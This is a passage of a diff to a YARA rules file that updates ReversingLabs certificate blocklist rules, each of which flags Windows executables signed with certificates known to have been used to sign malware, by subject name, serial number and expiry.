-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Qool Aid, LLC" and pe.signatures [ i ] . serial == "79:03:87:01:84:e1:8a:80:89:97:40:84:5a:15:e2:b2" and 1079654400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXPRESS BOOKS LTD" and ( pe.signatures [ i ] . serial == "00:a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" or pe.signatures [ i ] . serial == "a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" ) and 1636971821 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "129e981a-064a-5930-bd45-d03ed008451c"
+		id = "2f4a26f2-689a-57bd-8028-d3554e339e60"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15864-L15880"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9978-L9994"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8b7340359778e3aa56f6ea300973af74eb77efd54108d2ca2b6b8f04d89a1c39"
+		logic_hash = "2377eeb5316d25752443735e78d0ad7de398a2677f5a0fd45fd6e6c87720d49b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28181,21 +50575,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5f:ba:9b:37:3f:81:2c:16:ae:f5:31:d4" and 1473329076 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTRA ACADEMY LTD" and pe.signatures [ i ] . serial == "38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" and 1637141034 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "09e9e481-c767-53d3-9af1-11dec636cafb"
+		id = "b557864d-c573-5789-9959-8df3036d5ac5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15882-L15898"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9996-L10012"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "463ccd3ace9021569a7a6d5fcbaadf34b15d2b07baf3df526b271b547cf2bbc5"
+		logic_hash = "bc3ef217455b74900cae114d25b02325d2bef25c11873342df1dd2369cbce76a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28205,21 +50599,21 @@ rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lerges" and pe.signatures [ i ] . serial == "61:6a:52:05:23:85:90:b0:1d:7b:76:1e:44:4e:4a:d9" and 1421452800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Affairs-case s.r.o." and pe.signatures [ i ] . serial == "29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" and 1638832273 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a2dfd6e0-4475-537a-859e-126dd4a02af7"
+		id = "620c04df-e613-5319-aa00-646c7e0c8031"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15900-L15916"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10014-L10030"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3df7afba9eda9022a64647ce2a91119d0bdf6fe5b164a1e82b1819409024fbee"
+		logic_hash = "24bee3563e0867ef6702e7f57bbce7075f766410650ae5ce1e2e8c7b14a3eaca"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28229,21 +50623,21 @@ rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BLADES" and pe.signatures [ i ] . serial == "29:be:22:78:11:3d:d0:62:ea:dc:a3:2d:e6:b2:42:d0" and 1536883200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MACHINES SATU MARE SRL" and pe.signatures [ i ] . serial == "5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" and 1638390070 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9ce5b6c7-fede-508f-a7d0-f9d0b8838645"
+		id = "6678bd73-bf4d-5576-8bf2-b721ee288da7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15918-L15934"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10032-L10048"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3945f515b65ca3ffb6c2b64c884bb2790d703a277e1a5ba128c81bc63ed20a25"
+		logic_hash = "27610bb3bf069991803611474abf44a3bf82fc9283d0412a1c24ae46a3f5352e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28253,21 +50647,21 @@ rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "05:f7:0a:55:7a:fd:4a:44:3f:44:d0:ba:f0:bc:8c:60" and 1477440000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechnoElek s.r.o." and pe.signatures [ i ] . serial == "0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" and 1638372946 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1370a3b5-a254-5197-ac85-5b33e8d9fa38"
+		id = "37e60515-0395-51a5-8bfa-35e3e336d60c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15936-L15952"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10050-L10068"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f07cdfd522db0a92fe1dba30f158b2c89bb5424bdcdfda50ae42fcfddeac19ba"
+		logic_hash = "05b2f297454e7080591b85991b224193eb89fc5074eb3c2e484ceadad2de4cb7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28277,21 +50671,21 @@ rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "4e:06:65:d6:19:97:07:22:94:a7:0c:66:2f:72:ea:e3" and 1474502400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALVE ACTUATION LTD" and ( pe.signatures [ i ] . serial == "00:e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" or pe.signatures [ i ] . serial == "e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" ) and 1637712000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "55f1e321-ce70-519a-9a39-4278162edbef"
+		id = "da483b60-d400-54ef-84e0-ea00b299b466"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15954-L15970"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10070-L10086"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8acc57bbf334a48043dbee6fab7b7a54a44801b2ccd0ccd9d14194689c75c021"
+		logic_hash = "00b7ff8f3cbc04c48c71433c384d7a7884b856f261850e33ea4413a12cf5a1b5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28301,21 +50695,21 @@ rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shulan Hou" and pe.signatures [ i ] . serial == "74:70:2d:ff:5d:40:56:b8:47:d0:09:a2:26:5f:b1:b3" and 1469664000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Revo Security SRL" and pe.signatures [ i ] . serial == "06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" and 1637971201 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "20b95b80-94a9-51c3-9c6c-2a0ef75b0c0b"
+		id = "2a56ff80-584b-5b8b-80ae-e763339cd17a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15972-L15988"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10088-L10106"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "aa8f0fe1517134b6e562c2accc46420a4f0afd77c3a7bbe98d551c54e68ed4c7"
+		logic_hash = "74b1b48f0179187ea7bb8ef4663bf13da47f5c6405ecc5589706184564c05727"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28325,21 +50719,21 @@ rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Freak Limited" and pe.signatures [ i ] . serial == "35:3b:1c:f7:86:6e:e0:b0:ac:dd:53:2d:0b:b1:a2:20" and 1558915200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ambidekstr LLC" and ( pe.signatures [ i ] . serial == "00:c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" or pe.signatures [ i ] . serial == "c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" ) and 1616976000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3fd458e6-bf5a-51f3-9b46-344e9f8e0ffe"
+		id = "9019330e-5ab5-5d37-85a1-0e882dbd68ce"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15990-L16006"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10108-L10124"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1aafe547b8645f07498bac6f0ffd6d5aefbac160aa7a6fb8d1d891e70701ce99"
+		logic_hash = "f6780751ae553771eb57201a8672847a24512e6279b6a4fd843d8ee2f326860a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28349,21 +50743,21 @@ rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AEEPZ Limited" and pe.signatures [ i ] . serial == "09:3f:f2:87:0f:a3:3e:af:47:25:94:57:ee:58:c2:e0" and 1503532800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Venezia Design SRL" and pe.signatures [ i ] . serial == "04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" and 1641859201 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ca5b9ec0-2c46-50db-bc47-b3c6c61e990e"
+		id = "78f9fdf0-d8c6-5316-8053-42f77adf95d1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16008-L16024"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10126-L10142"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a160ada48048e11632082e7538459554d77d31539e53709cd897f3c454af8236"
+		logic_hash = "f10316a26e2d34400b7c2e403eab18ab6c1cc94b35f0ac8a3f490d101d29dc8d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28373,21 +50767,21 @@ rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "71:9c:17:a8:23:83:9d:ca:81:3e:e8:58:88:b3:b3:9a" and 1479686400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APRIL BROTHERS LTD" and pe.signatures [ i ] . serial == "12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" and 1642464000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "24741dc7-6252-5964-a69f-bef4b2dfe1a7"
+		id = "88ca65c4-ba0d-5676-979b-4fac737d4f21"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16026-L16042"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10144-L10160"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f24cdf890bd0b51a83ca333c37bc22068ab1f7e7ef36b36d94a133773097bd37"
+		logic_hash = "ea7d9fa7817751fef775765b54be5dd4d00c15ca50ac10fb40fb46cc3634c7b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28397,21 +50791,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dening Hu" and pe.signatures [ i ] . serial == "6d:c8:6e:bf:58:63:56:8e:22:37:b2:d8:95:82:d7:05" and 1471305600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Office Rat s.r.o." and pe.signatures [ i ] . serial == "3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" and 1643155200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9265bb94-b183-523f-91bf-9bc76ab63d6b"
+		id = "1e66d13c-3345-592c-9bf8-b8a566c8b9e6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16044-L16060"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10162-L10178"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "96269f41f82621aee029f343acfce70c781bf7713588dfe78fac35a3d1d3f7cd"
+		logic_hash = "3f64372d11d61c669580d90cdf2201e7f2904fb3d73d27be2ff1559c9c37614a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28421,21 +50815,21 @@ rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "21:4d:f5:9f:e5:38:74:cc:01:1d:d4:57:27:03:5f:51" and 1468800000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAMOYAJ LIMITED" and pe.signatures [ i ] . serial == "02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" and 1637712001 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9dd87769-73d0-5299-b6ed-936703abc78e"
+		id = "6da50886-7f15-5565-9a1a-f6fb25a729ac"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16062-L16078"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10180-L10198"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "190dffc36c17c27c43337d7914683b7bab3ff18a50de5278ed2a66f04b9e395d"
+		logic_hash = "3f3f1d5c871d2b73627d4281ac5bcd08799fb47f94155e82795d97c87de35e40"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28445,21 +50839,21 @@ rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aleman Ltd" and pe.signatures [ i ] . serial == "37:ca:4f:66:fd:cc:87:32:99:27:23:19:98:59:88:6c" and 1505952000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOUSE 9A s.r.o" and ( pe.signatures [ i ] . serial == "00:d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" or pe.signatures [ i ] . serial == "d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" ) and 1640822400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d5ca9d9d-e80f-56c1-90b7-ef931e61ba92"
+		id = "f7dd21fa-1501-50b2-bd9c-c33cfd932a6b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16080-L16098"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10200-L10216"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cd99e4d97d9a60f409cf072bbae254486c307ae3cb6e34c5cd9648c972615f36"
+		logic_hash = "a63c05cca23b61ba6eabda2b60c617b966a2669fd3a0da30354792e5c1ae2140"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -28469,21 +50863,21 @@ rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marts GmbH" and ( pe.signatures [ i ] . serial == "00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures [ i ] . serial == "be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" ) and 1676246400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "videoalarm s. r. o." and pe.signatures [ i ] . serial == "73:48:19:46:3c:11:95:bd:6e:13:5c:e4:d5:bf:49:bc" and 1637884800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1aebd2be-b22c-5102-a449-27025f61cce6"
+		id = "527b7963-340e-5d8f-b7e1-1269c0073ec9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16100-L16118"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10218-L10236"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f57ae32d7efd9cd4c0a207897e30b871dc32405c5b9ad844c9bb7eee4827cc5a"
+		logic_hash = "895983bcb7f3a0c5ce54504f4a2ff8d652137434b8951380d756de6556d0844e"
 		score = 75
